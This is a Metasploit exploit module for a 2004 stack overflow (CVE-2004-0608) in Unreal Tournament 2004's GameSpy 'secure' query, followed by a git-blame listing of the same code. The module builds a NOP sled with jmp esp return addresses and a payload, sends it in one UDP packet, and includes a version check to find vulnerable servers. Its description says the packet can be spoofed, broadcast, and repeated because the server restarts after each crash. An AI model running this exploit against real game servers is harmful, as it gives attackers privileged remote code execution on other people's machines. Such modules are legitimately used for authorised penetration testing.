modules/exploits/windows/games/ut2004_secure.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Udp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Unreal Tournament 2004 "secure" Overflow (Win32)',
      'Description'    => %q{

      This is an exploit for the GameSpy secure query in
      the Unreal Engine.

      This exploit only requires one UDP packet, which can
      be both spoofed and sent to a broadcast address.
      Usually, the GameSpy query server listens on port 7787,
      but you can manually specify the port as well.

      The RunServer.sh script will automatically restart the
      server upon a crash, giving us the ability to
      bruteforce the service and exploit it multiple
      times.

      },
      'Author'         => [ 'stinko' ],
      'License'        => BSD_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2004-0608'],
          [ 'OSVDB', '7217'],
          [ 'BID', '10570'],

        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 512,
          'BadChars' => "\x5c\x00",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['UT2004 Build 3186', { 'Rets' => [ 0x10184be3, 0x7ffdf0e4 ] }], # jmp esp
        ],
      'DisclosureDate' => '2004-06-18',
      'DefaultTarget' => 0))

    register_options(
      [
        Opt::RPORT(7787)
      ])

  end

  def exploit
    connect_udp

    buf = make_nops(1024)
    buf[0, 60] = [target['Rets'][0]].pack('V') * 15
    buf[54, 4] = [target['Rets'][1]].pack('V')
    buf[0,  8] = "\\secure\\"
    buf[buf.length - payload.encoded.length, payload.encoded.length] = payload.encoded

    udp_sock.put(buf)

    handler
    disconnect_udp
  end

  def ut_version
    connect_udp
    udp_sock.put("\\basic\\")
    res = udp_sock.recvfrom(8192)
    disconnect_udp

    if (res and (m=res.match(/\\gamever\\([0-9]{1,5})/)))
      return m[1]
    end

    return
  end

  def check
    vers = ut_version

    if (not vers)
      print_status("Could not detect Unreal Tournament Server")
      return
    end

    vprint_status("Detected Unreal Tournament Server Version: #{vers}")
    if (vers =~ /^(3120|3186|3204)$/)
      vprint_status("This system appears to be exploitable")
      return Exploit::CheckCode::Appears
    end


    if (vers =~ /^(2...)$/)
      vprint_status("This system appears to be running UT2003")
      return Exploit::CheckCode::Detected
    end

    vprint_status("This system appears to be patched")
    return Exploit::CheckCode::Safe
  end
end
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = GoodRanking`
Retab modules 2013-08-30 16:28:54 -05:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::Udp`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`def initialize(info = {})`
whitespace change 2010-02-02 06:19:34 +00:00			`super(update_info(info,`
New modules, module renames 2005-12-26 14:34:22 +00:00			`'Name' => 'Unreal Tournament 2004 "secure" Overflow (Win32)',`
			`'Description' => %q{`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`This is an exploit for the GameSpy secure query in`
			`the Unreal Engine.`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`This exploit only requires one UDP packet, which can`
			`be both spoofed and sent to a broadcast address.`
			`Usually, the GameSpy query server listens on port 7787,`
			`but you can manually specify the port as well.`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`The RunServer.sh script will automatically restart the`
			`server upon a crash, giving us the ability to`
			`bruteforce the service and exploit it multiple`
whitespace change 2010-02-02 06:19:34 +00:00			`times.`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`},`
			`'Author' => [ 'stinko' ],`
BSD license the default for non-msfdev created modules. 2006-05-06 16:34:39 +00:00			`'License' => BSD_LICENSE,`
New modules, module renames 2005-12-26 14:34:22 +00:00			`'References' =>`
			`[`
tons of indentation fixes, some other style tweaks 2010-09-20 08:06:27 +00:00			`[ 'CVE', '2004-0608'],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '7217'],`
New modules, module renames 2005-12-26 14:34:22 +00:00			`[ 'BID', '10570'],`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`],`
			`'Privileged' => true,`
			`'Payload' =>`
			`{`
			`'Space' => 512,`
			`'BadChars' => "\x5c\x00",`
			`},`
			`'Platform' => 'win',`
whitespace change 2010-02-02 06:19:34 +00:00			`'Targets' =>`
New modules, module renames 2005-12-26 14:34:22 +00:00			`[`
			`['UT2004 Build 3186', { 'Rets' => [ 0x10184be3, 0x7ffdf0e4 ] }], # jmp esp`
			`],`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2004-06-18',`
New modules, module renames 2005-12-26 14:34:22 +00:00			`'DefaultTarget' => 0))`
Retab modules 2013-08-30 16:28:54 -05:00
whitespace change 2010-02-02 06:19:34 +00:00			`register_options(`
			`[`
			`Opt::RPORT(7787)`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`def exploit`
			`connect_udp`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`buf = make_nops(1024)`
			`buf[0, 60] = [target['Rets'][0]].pack('V') * 15`
			`buf[54, 4] = [target['Rets'][1]].pack('V')`
			`buf[0, 8] = "\\secure\\"`
			`buf[buf.length - payload.encoded.length, payload.encoded.length] = payload.encoded`
Retab modules 2013-08-30 16:28:54 -05:00
whitespace change 2010-02-02 06:19:34 +00:00			`udp_sock.put(buf)`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`handler`
			`disconnect_udp`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`def ut_version`
			`connect_udp`
			`udp_sock.put("\\basic\\")`
			`res = udp_sock.recvfrom(8192)`
whitespace change 2010-02-02 06:19:34 +00:00			`disconnect_udp`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`if (res and (m=res.match(/\\gamever\\([0-9]{1,5})/)))`
			`return m[1]`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`return`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`def check`
			`vers = ut_version`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`if (not vers)`
			`print_status("Could not detect Unreal Tournament Server")`
			`return`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Saving progress 2014-01-21 11:07:03 -06:00			`vprint_status("Detected Unreal Tournament Server Version: #{vers}")`
New modules, module renames 2005-12-26 14:34:22 +00:00			`if (vers =~ /^(3120\|3186\|3204)$/)`
Saving progress 2014-01-21 11:07:03 -06:00			`vprint_status("This system appears to be exploitable")`
New modules, module renames 2005-12-26 14:34:22 +00:00			`return Exploit::CheckCode::Appears`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00

New modules, module renames 2005-12-26 14:34:22 +00:00			`if (vers =~ /^(2...)$/)`
Saving progress 2014-01-21 11:07:03 -06:00			`vprint_status("This system appears to be running UT2003")`
New modules, module renames 2005-12-26 14:34:22 +00:00			`return Exploit::CheckCode::Detected`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Saving progress 2014-01-21 11:07:03 -06:00			`vprint_status("This system appears to be patched")`
New modules, module renames 2005-12-26 14:34:22 +00:00			`return Exploit::CheckCode::Safe`
			`end`
Updated osvdb references from Steve Tornio, updated capture/eth_spoof modules 2009-07-27 14:05:23 +00:00			`end`